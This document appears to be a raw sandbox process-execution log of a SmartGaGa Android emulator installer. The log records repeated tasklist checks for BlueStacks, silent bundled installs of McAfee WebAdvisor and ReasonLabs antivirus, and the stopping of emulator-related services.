C:\Users\Admin\AppData\Local\Temp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe

"C:\Users\Admin\AppData\Local\Temp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe" /LANG=en

C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PKQAV.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp" /SL5="$9043A,839193,832512,C:\Users\Admin\AppData\Local\Temp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.exe" /LANG=en

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7492 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9276 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component0.exe

"C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component0.exe" -ip:"dui=50b25195-d6c8-43bb-b2ca-a8bd616967ef&dit=20240630033545&is_silent=true&oc=ZB_RAV_Cross_Solo_Soft&p=58f9&a=100&b=&se=true" -i

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe

"C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB

C:\Users\Admin\AppData\Local\Temp\yx4yle0s.exe

"C:\Users\Admin\AppData\Local\Temp\yx4yle0s.exe" /silent

C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe

.\UnifiedStub-installer.exe /silent

C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe

"C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe" -i -bn:ReasonLabs -pn:EPP -lpn:rav_antivirus -url:https://update.reasonsecurity.com/v2/live -dt:10

C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe

"C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe" -pn:EPP -lpn:rav_antivirus -url:https://update.reasonsecurity.com/v2/live -bn:ReasonLabs -dt:10

C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe

"C:\Users\Admin\Downloads\smartgaga-android-emulator-1.1.646.1-installer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\installer.exe

"C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component1_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5712 -ip 5712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 1572

C:\Program Files\McAfee\Temp1169930912\installer.exe

"C:\Program Files\McAfee\Temp1169930912\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5712 -ip 5712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2368

C:\Windows\SYSTEM32\regsvr32.exe

regsvr32.exe /s "C:\Program Files\McAfee\WebAdvisor\win32\WSSDep.dll"

C:\Windows\SysWOW64\regsvr32.exe

/s "C:\Program Files\McAfee\WebAdvisor\win32\WSSDep.dll"

C:\Windows\SYSTEM32\regsvr32.exe

regsvr32.exe /s "C:\Program Files\McAfee\WebAdvisor\x64\WSSDep.dll"

C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe

"C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\McAfee\WebAdvisor\UIHost.exe

"C:\Program Files\McAfee\WebAdvisor\UIHost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM adb.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ProjectTitan.exe

C:\Program Files\McAfee\WebAdvisor\updater.exe

"C:\Program Files\McAfee\WebAdvisor\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe -type 11

C:\Windows\SysWOW64\sc.exe

sc.exe stop AndroidKernel

C:\Windows\SysWOW64\sc.exe

sc.exe delete AndroidKernel

C:\Windows\SysWOW64\sc.exe

sc.exe stop TitanService

C:\Windows\SysWOW64\sc.exe

sc.exe delete TitanService

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Program Files\ReasonLabs\EPP\x64\rsKernelEngine.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" im C:\Program Files\ReasonLabs\EPP\x64\rsKernelEngineEvents.xml

C:\Windows\SYSTEM32\fltmc.exe

"fltmc.exe" load rsKernelEngine

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" im C:\Program Files\ReasonLabs\EPP\elam\evntdrv.xml

C:\Program Files\ReasonLabs\EPP\rsWSC.exe

"C:\Program Files\ReasonLabs\EPP\rsWSC.exe" -i -i

C:\Program Files\ReasonLabs\EPP\rsWSC.exe

"C:\Program Files\ReasonLabs\EPP\rsWSC.exe"

C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe

"C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe" -i -i

C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe

"C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe"

C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe

"C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe" -i -i

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe

"C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe"

C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe

"C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe" -i -i

F:\ProjectTitan\Engine\Launcher.exe

F:\ProjectTitan\Engine\Launcher.exe --install-service

C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe

"C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe"

F:\ProjectTitan\Engine\TitanService.exe

"F:\ProjectTitan\Engine\TitanService.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\InstallReport.exe -type 1

\??\c:\program files\reasonlabs\epp\rsHelper.exe

"c:\program files\reasonlabs\epp\rsHelper.exe"

\??\c:\program files\reasonlabs\EPP\ui\EPP.exe

"c:\program files\reasonlabs\EPP\ui\EPP.exe" --minimized --first-run

C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe

"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" "c:\program files\reasonlabs\EPP\ui\app.asar" --engine-path="c:\program files\reasonlabs\EPP" --minimized --first-run

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe

"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2200 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe

"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --mojo-platform-channel-handle=2660 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe

"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2832 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe

"C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP" --standard-schemes=mc --secure-schemes=mc --bypasscsp-schemes --cors-schemes --fetch-schemes --service-worker-schemes --streaming-schemes --app-user-model-id=com.reasonlabs.epp --app-path="C:\Program Files\ReasonLabs\Common\Client\v1.4.2\resources\app.asar" --enable-sandbox --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3860 --field-trial-handle=2264,i,8220543454358863837,9649987176205850469,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe

